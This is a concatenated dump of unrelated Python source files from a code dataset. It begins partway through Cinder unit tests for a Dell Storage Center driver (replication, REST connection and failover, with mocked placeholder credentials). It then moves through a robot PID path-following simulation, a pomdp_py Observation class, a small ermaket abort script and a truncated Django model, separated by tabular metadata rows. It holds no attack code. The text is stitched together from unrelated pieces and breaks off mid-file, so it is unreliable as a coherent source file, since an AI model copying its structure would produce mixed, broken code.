self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_replay_list')
def test_find_common_replay(self,
mock_get_replay_list,
mock_close_connection,
mock_open_connection,
mock_init):
dreplays = [{'globalIndex': '11111.113'},
{'globalIndex': '11111.112'},
{'globalIndex': '11111.111'}]
sreplays = [{'globalIndex': '12345.112'},
{'globalIndex': '12345.111'},
{'globalIndex': '11111.112'},
{'globalIndex': '11111.111'}]
xreplays = [{'globalIndex': '12345.112'},
{'globalIndex': '12345.111'}]
mock_get_replay_list.side_effect = [dreplays, sreplays,
dreplays, xreplays]
ret = self.scapi.find_common_replay({'instanceId': '12345.1'},
{'instanceId': '11111.1'})
self.assertEqual({'globalIndex': '11111.112'}, ret)
ret = self.scapi.find_common_replay(None, {'instanceId': '11111.1'})
self.assertIsNone(ret)
ret = self.scapi.find_common_replay({'instanceId': '12345.1'}, None)
self.assertIsNone(ret)
ret = self.scapi.find_common_replay({'instanceId': '12345.1'},
{'instanceId': '11111.1'})
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_qos')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
def test_start_replication(self,
mock_post,
mock_get_json,
mock_find_qos,
mock_close_connection,
mock_open_connection,
mock_init):
svolume = {'name': 'guida', 'instanceId': '12345.101',
'scSerialNumber': 12345}
dvolume = {'name': 'guidb', 'instanceId': '11111.101',
'scSerialNumber': 11111}
mock_post.return_value = self.RESPONSE_200
mock_get_json.return_value = {'instanceId': '12345.201'}
mock_find_qos.return_value = {'instanceId': '12345.1'}
expected = {'QosNode': '12345.1',
'SourceVolume': '12345.101',
'StorageCenter': 12345,
'ReplicateActiveReplay': False,
'Type': 'Asynchronous',
'DestinationVolume': '11111.101',
'DestinationStorageCenter': 11111}
ret = self.scapi.start_replication(svolume, dvolume, 'Asynchronous',
'cinderqos', False)
self.assertEqual(mock_get_json.return_value, ret)
mock_post.assert_called_once_with('StorageCenter/ScReplication',
expected, True)
mock_post.return_value = self.RESPONSE_400
ret = self.scapi.start_replication(svolume, dvolume, 'Asynchronous',
'cinderqos', False)
self.assertIsNone(ret)
mock_post.return_value = self.RESPONSE_200
mock_find_qos.return_value = None
ret = self.scapi.start_replication(svolume, dvolume, 'Asynchronous',
'cinderqos', False)
self.assertIsNone(ret)
mock_find_qos.return_value = {'instanceId': '12345.1'}
ret = self.scapi.start_replication(None, dvolume, 'Asynchronous',
'cinderqos', False)
self.assertIsNone(ret)
ret = self.scapi.start_replication(svolume, None, 'Asynchronous',
'cinderqos', False)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_common_replay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_replay')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'start_replication')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post')
def test_replicate_to_common(self,
mock_post,
mock_get_json,
mock_start_replication,
mock_create_replay,
mock_find_common_replay,
mock_close_connection,
mock_open_connection,
mock_init):
creplay = {'instanceId': '11111.201'}
svolume = {'name': 'guida'}
dvolume = {'name': 'guidb', 'volumeFolder': {'instanceId': '11111.1'}}
vvolume = {'name': 'guidc'}
mock_find_common_replay.return_value = creplay
mock_post.return_value = self.RESPONSE_200
mock_get_json.return_value = vvolume
mock_create_replay.return_value = {'instanceId': '12345.202'}
mock_start_replication.return_value = {'instanceId': '12345.203'}
# Simple common test.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertEqual(mock_start_replication.return_value, ret)
mock_post.assert_called_once_with(
'StorageCenter/ScReplay/11111.201/CreateView',
{'Name': 'fback:guidb',
'Notes': 'Created by Dell Cinder Driver',
'VolumeFolder': '11111.1'},
True)
mock_create_replay.assert_called_once_with(svolume, 'failback', 600)
mock_start_replication.assert_called_once_with(svolume, vvolume,
'Asynchronous',
'cinderqos',
False)
mock_create_replay.return_value = None
# Unable to create a replay.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertIsNone(ret)
mock_create_replay.return_value = {'instanceId': '12345.202'}
mock_get_json.return_value = None
# Create view volume fails.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertIsNone(ret)
mock_get_json.return_value = vvolume
mock_post.return_value = self.RESPONSE_400
# Post call returns an error.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertIsNone(ret)
mock_post.return_value = self.RESPONSE_200
mock_find_common_replay.return_value = None
# No common replay found.
ret = self.scapi.replicate_to_common(svolume, dvolume, 'cinderqos')
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'delete_replication')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'start_replication')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'rename_volume')
def test_flip_replication(self,
mock_rename_volume,
mock_start_replication,
mock_delete_replication,
mock_close_connection,
mock_open_connection,
mock_init):
svolume = {'scSerialNumber': '12345.1'}
dvolume = {'scSerialNumber': '11111.1'}
name = 'guid'
replicationtype = 'Synchronous'
qosnode = 'cinderqos'
activereplay = True
mock_delete_replication.return_value = True
mock_start_replication.return_value = {'instanceId': '11111.101'}
mock_rename_volume.return_value = True
# Good run.
ret = self.scapi.flip_replication(svolume, dvolume, name,
replicationtype, qosnode,
activereplay)
self.assertTrue(ret)
mock_delete_replication.assert_called_once_with(svolume, '11111.1',
False)
mock_start_replication.assert_called_once_with(dvolume, svolume,
replicationtype,
qosnode, activereplay)
mock_rename_volume.assert_any_call(svolume, 'Cinder repl of guid')
mock_rename_volume.assert_any_call(dvolume, 'guid')
mock_rename_volume.return_value = False
# Unable to rename volumes.
ret = self.scapi.flip_replication(svolume, dvolume, name,
replicationtype, qosnode,
activereplay)
self.assertFalse(ret)
mock_rename_volume.return_value = True
mock_start_replication.return_value = None
# Start replication call fails.
ret = self.scapi.flip_replication(svolume, dvolume, name,
replicationtype, qosnode,
activereplay)
self.assertFalse(ret)
mock_delete_replication.return_value = False
mock_start_replication.return_value = {'instanceId': '11111.101'}
# Delete old replication call fails.
ret = self.scapi.flip_replication(svolume, dvolume, name,
replicationtype, qosnode,
activereplay)
self.assertFalse(ret)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get')
def test_replication_progress(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
mock_get.return_value = self.RESPONSE_200
mock_get_json.return_value = {'synced': True,
'amountRemaining': '0 Bytes'}
# Good run
retbool, retnum = self.scapi.replication_progress('11111.101')
self.assertTrue(retbool)
self.assertEqual(0.0, retnum)
# SC replication ID is None.
retbool, retnum = self.scapi.replication_progress(None)
self.assertIsNone(retbool)
self.assertIsNone(retnum)
mock_get.return_value = self.RESPONSE_400
# Get progress call fails.
retbool, retnum = self.scapi.replication_progress('11111.101')
self.assertIsNone(retbool)
self.assertIsNone(retnum)
class DellSCSanAPIConnectionTestCase(test.TestCase):
"""DellSCSanAPIConnectionTestCase
Class to test the Storage Center API connection using Mock.
"""
# Create a Response object that indicates OK
response_ok = models.Response()
response_ok.status_code = 200
response_ok.reason = u'ok'
RESPONSE_200 = response_ok
# Create a Response object with no content
response_nc = models.Response()
response_nc.status_code = 204
response_nc.reason = u'duplicate'
RESPONSE_204 = response_nc
    # Create a Response object that is a pure error.
response_bad = models.Response()
response_bad.status_code = 400
response_bad.reason = u'bad request'
RESPONSE_400 = response_bad
APIDICT = {u'instanceId': u'0',
u'hostName': u'192.168.0.200',
u'userId': 434226,
u'connectionKey': u'',
u'minApiVersion': u'0.1',
u'webServicesPort': 3033,
u'locale': u'en_US',
u'objectType': u'ApiConnection',
u'secureString': u'',
u'applicationVersion': u'2.0.1',
u'source': u'REST',
u'commandLine': False,
u'application': u'Cinder REST Driver',
u'sessionKey': 1436460614863,
u'provider': u'EnterpriseManager',
u'instanceName': u'ApiConnection',
u'connected': True,
u'userName': u'Admin',
u'useHttps': False,
u'providerVersion': u'15.3.1.186',
u'apiVersion': u'2.2',
u'apiBuild': 199}
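    # APIDICT above is a canned JSON body for a successful ApiConnection
    # login; test_open_connection below has _get_json return it so that
    # open_connection sees what looks like a real REST login response.
    # Nothing in this excerpt asserts against the individual field values,
    # which are sample data only.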
def setUp(self):
super(DellSCSanAPIConnectionTestCase, self).setUp()
# Configuration is a mock. A mock is pretty much a blank
        # slate. I believe mocks created in setUp are not happy-time
# mocks. So we just do a few things like driver config here.
self.configuration = mock.Mock()
self.configuration.san_is_local = False
self.configuration.san_ip = "192.168.0.1"
self.configuration.san_login = "admin"
self.configuration.san_password = "mmm"
self.configuration.dell_sc_ssn = 12345
self.configuration.dell_sc_server_folder = 'openstack'
self.configuration.dell_sc_volume_folder = 'openstack'
        # Note that we set this to True even though we do not
        # test this functionality. This is sent directly to
        # the requests calls as the verify parameter, and since
        # requests is a third party library that is deeply stubbed
        # out here, it is not directly testable by this code. Note
        # that if this setting is wrong the driver fails to even
        # come up.
self.configuration.dell_sc_verify_cert = True
self.configuration.dell_sc_api_port = 3033
self.configuration.iscsi_ip_address = '192.168.1.1'
self.configuration.iscsi_port = 3260
self._context = context.get_admin_context()
self.apiversion = '2.0'
# Set up the StorageCenterApi
self.scapi = dell_storagecenter_api.StorageCenterApi(
self.configuration.san_ip,
self.configuration.dell_sc_api_port,
self.configuration.san_login,
self.configuration.san_password,
self.configuration.dell_sc_verify_cert,
self.apiversion)
# Set up the scapi configuration vars
self.scapi.ssn = self.configuration.dell_sc_ssn
self.scapi.sfname = self.configuration.dell_sc_server_folder
self.scapi.vfname = self.configuration.dell_sc_volume_folder
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=APIDICT)
def test_open_connection(self,
mock_get_json,
mock_post):
self.scapi.open_connection()
self.assertTrue(mock_post.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_check_version_fail',
return_value=RESPONSE_400)
def test_open_connection_failure(self,
mock_check_version_fail,
mock_post):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.open_connection)
self.assertTrue(mock_check_version_fail.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_check_version_fail',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=APIDICT)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_open_connection_sc(self,
mock_post,
mock_get_json,
mock_check_version_fail):
self.scapi.open_connection()
self.assertTrue(mock_check_version_fail.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_close_connection(self,
mock_post):
self.scapi.close_connection()
self.assertTrue(mock_post.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_close_connection_failure(self,
mock_post):
self.scapi.close_connection()
self.assertTrue(mock_post.called)
class DellHttpClientTestCase(test.TestCase):
"""DellSCSanAPIConnectionTestCase
Class to test the Storage Center API connection using Mock.
"""
ASYNCTASK = {"state": "Running",
"methodName": "GetScUserPreferencesDefaults",
"error": "",
"started": True,
"userName": "",
"localizedError": "",
"returnValue": "https://localhost:3033/api/rest/"
"ApiConnection/AsyncTask/1418394170395",
"storageCenter": 0,
"errorState": "None",
"successful": False,
"stepMessage": "Running Method [Object: ScUserPreferences] "
"[Method: GetScUserPreferencesDefaults]",
"localizedStepMessage": "",
"warningList": [],
"totalSteps": 2,
"timeFinished": "1969-12-31T18:00:00-06:00",
"timeStarted": "2015-01-07T14:07:10-06:00",
"currentStep": 1,
"objectTypeName": "ScUserPreferences",
"objectType": "AsyncTask",
"instanceName": "1418394170395",
"instanceId": "1418394170395"}
# Create a Response object that indicates OK
response_ok = models.Response()
response_ok.status_code = 200
response_ok.reason = u'ok'
RESPONSE_200 = response_ok
# Create a Response object with no content
response_nc = models.Response()
response_nc.status_code = 204
response_nc.reason = u'duplicate'
RESPONSE_204 = response_nc
    # Create a Response object that is a pure error.
response_bad = models.Response()
response_bad.status_code = 400
response_bad.reason = u'bad request'
RESPONSE_400 = response_bad
def setUp(self):
super(DellHttpClientTestCase, self).setUp()
self.host = 'localhost'
self.port = '3033'
self.user = 'johnnyuser'
self.password = 'password'
self.verify = False
self.apiversion = '3.1'
self.httpclient = dell_storagecenter_api.HttpClient(
self.host, self.port, self.user, self.password,
self.verify, self.apiversion)
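    # The tests below pin down how _get_async_url is expected to behave: it
    # reduces the task's returnValue URL to its 'api/rest/...' path, falls
    # back to appending instanceId when the ID is missing from that URL, and
    # raises when neither is usable.  A minimal, hypothetical sketch of that
    # behaviour (not the driver's actual implementation):
    #     path = urllib.parse.urlparse(task['returnValue']).path.lstrip('/')
    #     if path.endswith('/'):          # ID missing from the URL
    #         path += task['instanceId']  # fall back to the instanceId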
def test_get_async_url(self):
url = self.httpclient._get_async_url(self.ASYNCTASK)
self.assertEqual('api/rest/ApiConnection/AsyncTask/1418394170395', url)
def test_get_async_url_no_id_on_url(self):
badTask = self.ASYNCTASK.copy()
badTask['returnValue'] = ('https://localhost:3033/api/rest/'
'ApiConnection/AsyncTask/')
url = self.httpclient._get_async_url(badTask)
self.assertEqual('api/rest/ApiConnection/AsyncTask/1418394170395', url)
def test_get_async_url_none(self):
self.assertRaises(AttributeError, self.httpclient._get_async_url, None)
def test_get_async_url_no_id(self):
badTask = self.ASYNCTASK.copy()
badTask['returnValue'] = ('https://localhost:3033/api/rest/'
'ApiConnection/AsyncTask/')
badTask['instanceId'] = ''
self.assertRaises(exception.VolumeBackendAPIException,
self.httpclient._get_async_url, badTask)
def test_rest_ret(self):
rest_response = self.RESPONSE_200
response = self.httpclient._rest_ret(rest_response, False)
self.assertEqual(self.RESPONSE_200, response)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'_wait_for_async_complete',
return_value=RESPONSE_200)
def test_rest_ret_async(self,
mock_wait_for_async_complete):
mock_rest_response = mock.MagicMock()
mock_rest_response.status_code = 202
response = self.httpclient._rest_ret(mock_rest_response, True)
self.assertEqual(self.RESPONSE_200, response)
self.assertTrue(mock_wait_for_async_complete.called)
def test_rest_ret_async_error(self):
mock_rest_response = mock.MagicMock()
mock_rest_response.status_code = 400
self.assertRaises(exception.VolumeBackendAPIException,
self.httpclient._rest_ret, mock_rest_response, True)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_wait_for_async_complete(self,
mock_get):
ret = self.httpclient._wait_for_async_complete(self.ASYNCTASK)
self.assertEqual(self.RESPONSE_200, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'_get_async_url',
return_value=None)
def test_wait_for_async_complete_bad_url(self,
mock_get_async_url):
ret = self.httpclient._wait_for_async_complete(self.ASYNCTASK)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_wait_for_async_complete_bad_result(self,
mock_get):
ret = self.httpclient._wait_for_async_complete(self.ASYNCTASK)
self.assertEqual(self.RESPONSE_400, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_wait_for_async_complete_loop(self,
mock_get):
mock_response = mock.MagicMock()
mock_response.content = mock.MagicMock()
mock_response.json = mock.MagicMock()
mock_response.json.side_effect = [self.ASYNCTASK,
{'objectType': 'ScVol'}]
ret = self.httpclient._wait_for_async_complete(self.ASYNCTASK)
self.assertEqual(self.RESPONSE_200, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get')
def test_wait_for_async_complete_get_raises(self,
mock_get):
mock_get.side_effect = (exception.DellDriverRetryableException())
self.assertRaises(exception.VolumeBackendAPIException,
self.httpclient._wait_for_async_complete,
self.ASYNCTASK)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'_rest_ret',
return_value=RESPONSE_200)
@mock.patch.object(requests.Session,
'get',
return_value=RESPONSE_200)
def test_get(self,
mock_get,
mock_rest_ret):
ret = self.httpclient.get('url', False)
self.assertEqual(self.RESPONSE_200, ret)
mock_rest_ret.assert_called_once_with(self.RESPONSE_200, False)
expected_headers = self.httpclient.header.copy()
mock_get.assert_called_once_with('https://localhost:3033/api/rest/url',
headers=expected_headers,
verify=False)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'_rest_ret',
return_value=RESPONSE_200)
@mock.patch.object(requests.Session,
'get',
return_value=RESPONSE_200)
def test_get_async(self,
mock_get,
mock_rest_ret):
ret = self.httpclient.get('url', True)
self.assertEqual(self.RESPONSE_200, ret)
mock_rest_ret.assert_called_once_with(self.RESPONSE_200, True)
expected_headers = self.httpclient.header.copy()
expected_headers['async'] = True
mock_get.assert_called_once_with('https://localhost:3033/api/rest/url',
headers=expected_headers,
verify=False)
class DellStorageCenterApiHelperTestCase(test.TestCase):
"""DellStorageCenterApiHelper test case
Class to test the Storage Center API helper using Mock.
"""
def setUp(self):
super(DellStorageCenterApiHelperTestCase, self).setUp()
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'open_connection')
def test_setup_connection(self,
mock_open_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.dell_sc_volume_folder = 'a'
config.dell_sc_server_folder = 'a'
config.dell_sc_verify_cert = False
config.san_port = 3033
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
ret = helper._setup_connection()
self.assertEqual(12345, ret.primaryssn)
self.assertEqual(12345, ret.ssn)
self.assertEqual('FibreChannel', ret.protocol)
mock_open_connection.assert_called_once_with()
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'open_connection')
def test_setup_connection_iscsi(self,
mock_open_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.dell_sc_volume_folder = 'a'
config.dell_sc_server_folder = 'a'
config.dell_sc_verify_cert = False
config.san_port = 3033
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'iSCSI')
ret = helper._setup_connection()
self.assertEqual(12345, ret.primaryssn)
self.assertEqual(12345, ret.ssn)
self.assertEqual('Iscsi', ret.protocol)
mock_open_connection.assert_called_once_with()
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'open_connection')
def test_setup_connection_failover(self,
mock_open_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.dell_sc_volume_folder = 'a'
config.dell_sc_server_folder = 'a'
config.dell_sc_verify_cert = False
config.san_port = 3033
helper = dell_storagecenter_api.StorageCenterApiHelper(config, '67890',
'iSCSI')
ret = helper._setup_connection()
self.assertEqual(12345, ret.primaryssn)
self.assertEqual(67890, ret.ssn)
self.assertEqual('Iscsi', ret.protocol)
mock_open_connection.assert_called_once_with()
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection(self,
mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_connection = mock.MagicMock()
mock_connection.apiversion = '3.1'
mock_setup_connection.return_value = mock_connection
ret = helper.open_connection()
self.assertEqual('3.1', ret.apiversion)
self.assertEqual('192.168.0.101', helper.san_ip)
self.assertEqual('username', helper.san_login)
self.assertEqual('password', helper.san_password)
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection_fail_no_secondary(self,
mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
config.secondary_san_ip = ''
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_setup_connection.side_effect = (
exception.VolumeBackendAPIException('abc'))
self.assertRaises(exception.VolumeBackendAPIException,
helper.open_connection)
mock_setup_connection.assert_called_once_with()
self.assertEqual('192.168.0.101', helper.san_ip)
self.assertEqual('username', helper.san_login)
self.assertEqual('password', helper.san_password)
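    # The next tests document the failover behaviour of open_connection:
    # the primary san_ip/san_login credentials are tried first, and only
    # when secondary_san_ip, secondary_san_login and secondary_san_password
    # are all configured does a failure retry against the secondary; a later
    # failure on the secondary flips the helper back to the primary.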
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection_secondary(self,
mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
config.secondary_san_ip = '192.168.0.102'
config.secondary_san_login = 'username2'
config.secondary_san_password = 'password2'
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_connection = mock.MagicMock()
mock_connection.apiversion = '3.1'
mock_setup_connection.side_effect = [
(exception.VolumeBackendAPIException('abc')), mock_connection]
ret = helper.open_connection()
self.assertEqual('3.1', ret.apiversion)
self.assertEqual(2, mock_setup_connection.call_count)
self.assertEqual('192.168.0.102', helper.san_ip)
self.assertEqual('username2', helper.san_login)
self.assertEqual('password2', helper.san_password)
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection_fail_partial_secondary_config(
self, mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
config.secondary_san_ip = '192.168.0.102'
config.secondary_san_login = 'username2'
config.secondary_san_password = ''
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_setup_connection.side_effect = (
exception.VolumeBackendAPIException('abc'))
self.assertRaises(exception.VolumeBackendAPIException,
helper.open_connection)
mock_setup_connection.assert_called_once_with()
self.assertEqual('192.168.0.101', helper.san_ip)
self.assertEqual('username', helper.san_login)
self.assertEqual('password', helper.san_password)
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection_to_secondary_and_back(self,
mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
config.secondary_san_ip = '192.168.0.102'
config.secondary_san_login = 'username2'
config.secondary_san_password = 'password2'
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_connection = mock.MagicMock()
mock_connection.apiversion = '3.1'
mock_setup_connection.side_effect = [
(exception.VolumeBackendAPIException('abc')), mock_connection,
(exception.VolumeBackendAPIException('abc')), mock_connection]
helper.open_connection()
self.assertEqual('192.168.0.102', helper.san_ip)
self.assertEqual('username2', helper.san_login)
self.assertEqual('password2', helper.san_password)
self.assertEqual(2, mock_setup_connection.call_count)
helper.open_connection()
self.assertEqual('192.168.0.101', helper.san_ip)
self.assertEqual('username', helper.san_login)
self.assertEqual('password', helper.san_password)
| 47.487374 | 79 | 0.516733 | [
"Apache-2.0"
] | bswartz/cinder | cinder/tests/unit/test_dellscapi.py | 344,141 | Python |
from vec2d_jdm import Vec2D
import math
class Robot(object):
ROBOT_WIDTH = 10
ROBOT_HEIGHT = 15
ROBOT_EDGE = 2
TRAJ_THICKNESS = 4
def __init__(self, speed, canvaswidth, canvasheight, path,
color = "blue", trajColor = "red"):
self.canvaswidth = canvaswidth
self.canvasheight = canvasheight
self.speed = speed
self.height = Robot.ROBOT_HEIGHT
self.v = Vec2D(0, speed)
        # Origin is actually at the center top of the canvas.
self.pos = Vec2D(0, 0)
self.t = 0
self.color = color
self.trajColor = trajColor
self.path = path
self.trajectory = []
def update(self):
self.t += 1
self.pos += self.v
self.trajectory.append(self.pos)
self.correctError()
# This is where different algorithms differ
def correctError(self):
pass
def draw(self, canvas):
self.drawTrajectory(canvas)
self.drawRobot(canvas)
def drawTrajectory(self, canvas):
for point in self.trajectory:
x = point.x
y = point.y
canvas.create_oval(x + self.canvaswidth / 2
- Robot.TRAJ_THICKNESS / 2,
y - Robot.TRAJ_THICKNESS / 2,
x + self.canvaswidth / 2
+ Robot.TRAJ_THICKNESS / 2,
                                   y + Robot.TRAJ_THICKNESS / 2,
fill = self.trajColor, width = 0)
def drawRobot(self, canvas):
angle = self.v.get_angle()
# The side of the robot that's perpendicular to its velocity
perpSide = Vec2D(Robot.ROBOT_WIDTH,0)
perpSide = perpSide.set_angle(angle - 90)
# The parallel side
paraSide = Vec2D(Robot.ROBOT_HEIGHT,0)
paraSide = paraSide.set_angle(angle)
# The bottom edge
(x0, y0) = (round((self.pos - perpSide * 0.5).x),
round((self.pos - perpSide * 0.5).y))
(x1, y1) = (round((self.pos + perpSide * 0.5).x),
round((self.pos + perpSide * 0.5).y))
canvas.create_line(x0 + self.canvaswidth / 2, y0,
x1 + self.canvaswidth / 2, y1, width = Robot.ROBOT_EDGE,
fill = self.color)
# The left edge
x2 = x0 + round(paraSide.x)
y2 = y0 + round(paraSide.y)
canvas.create_line(x0 + self.canvaswidth / 2, y0,
x2 + self.canvaswidth / 2, y2, width = Robot.ROBOT_EDGE,
fill = self.color)
# The right edge
x3 = x1 + round(paraSide.x)
y3 = y1 + round(paraSide.y)
canvas.create_line(x1 + self.canvaswidth / 2, y1,
x3 + self.canvaswidth / 2, y3, width = Robot.ROBOT_EDGE,
fill = self.color)
# The top edge
canvas.create_line(x2 + self.canvaswidth / 2, y2,
x3 + self.canvaswidth / 2, y3, width = Robot.ROBOT_EDGE,
fill = self.color)
class Robot_PID(Robot):
def __init__(self,speed, canvaswidth, canvasheight, path,
P, I, D, color = "blue"):
super().__init__( speed, canvaswidth, canvasheight, path, color)
self.P = P
self.I = I
self.D = D
self.lastErr = 0
self.totalErr = 0
def correctError(self):
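        # Cross-track error is measured at a look-ahead point one robot length
        # ahead of the current position; its sign comes from which side of the
        # path the robot is on. The velocity vector is then rotated by
        # P*error + I*total_error + D*(error - last_error).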
front = self.pos + self.v.normal() * self.height
closestPoint = self.path.closestPoint(front)
errorVec = closestPoint - self.pos
error = errorVec.length()
# Determine the sign of the error
# + if path on the left, - if on the right
theta = self.v.get_angle_between(errorVec)
if theta < 0:
error *= -1
self.totalErr += error
derivative = error - self.lastErr
self.lastErr = error
correction = (self.P * error +
self.I * self.totalErr +
self.D * derivative)
self.v.rotated(correction, True)
class Robot_intelligent(Robot):
pass
class Path(object):
THICKNESS = 2
def __init__(self, f, canvaswidth, canvasheight,
color = "black", resolution = 500):
self.resolution = resolution
self.path = f
self.height = canvasheight
self.width = canvaswidth
self.color = color
def getPoint(self, t):
return self.path(t)
def closestPoint(self, pos):
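        # Brute-force nearest-point search: sample the parametric path at
        # `resolution` evenly spaced values of t and keep the closest sample.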
minDistance = None
for i in range(self.resolution):
t = i / self.resolution # t in [0, 1)
point = self.getPoint(t)
d = ((pos.x - point.x)**2 + (pos.y - point.y)**2)**0.5
            if minDistance is None or d < minDistance:
minDistance = d
result = point
return result
def draw(self, canvas):
for i in range(self.resolution):
t = i / self.resolution # t in [0, 1)
point = self.getPoint(t)
x = point.x
y = point.y
canvas.create_oval(x + self.width / 2 - Path.THICKNESS / 2,
y - Path.THICKNESS / 2,
x + self.width / 2 + Path.THICKNESS / 2,
y + Path.THICKNESS / 2,
fill = self.color)
| 33.916129 | 72 | 0.531101 | [
"Apache-2.0"
] | harveybia/the-flash-sudo | Mobot_simulation/Robot.py | 5,257 | Python |
#!/usr/bin/env python
def main():
print("test script")
if __name__ == '__main__':
main() | 12.375 | 26 | 0.59596 | [
"MIT"
] | sdementen/gnucash-utilities | scripts/gc_test.py | 99 | Python |
import pomdp_py
class Observation(pomdp_py.Observation):
"""Defines the Observation for the continuous light-dark domain;
Observation space:
:math:`\Omega\subseteq\mathbb{R}^2` the observation of the robot is
an estimate of the robot position :math:`g(x_t)\in\Omega`.
"""
# the number of decimals to round up an observation when it is discrete.
PRECISION=2
def __init__(self, position, discrete=False):
"""
Initializes a observation in light dark domain.
Args:
position (tuple): position of the robot.
"""
self._discrete = discrete
if len(position) != 2:
raise ValueError("Observation position must be a vector of length 2")
if self._discrete:
self.position = position
else:
self.position = (round(position[0], Observation.PRECISION),
round(position[1], Observation.PRECISION))
def discretize(self):
return Observation(self.position, discrete=True)
def __hash__(self):
return hash(self.position)
def __eq__(self, other):
if isinstance(other, Observation):
return self.position == other.position
else:
return False
def __str__(self):
return self.__repr__()
def __repr__(self):
return "Observation(%s)" % (str(self.position))
| 29.854167 | 81 | 0.604327 | [
"MIT"
] | Deathn0t/pomdp-py | pomdp_problems/light_dark/domain/observation.py | 1,433 | Python |
from ermaket.api.scripts import ReturnContext, UserScript
__all__ = ['script']
script = UserScript(id=2)
@script.register
def no_way(context):
return ReturnContext(abort=418, abort_msg="I am a teapot")
| 19.090909 | 62 | 0.752381 | [
"Apache-2.0"
] | SqrtMinusOne/ERMaket | ermaket/tests/dummy_scripts/script_abort.py | 210 | Python |
from django.conf import settings
from django.db import models
from django.db.models.signals import post_save, pre_save
from .utils import Mailchimp
class MarketingPreference(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL)
subscribed = models.BooleanField(default=True)
mailchimp_subscribed = models.NullBooleanField(blank=True)
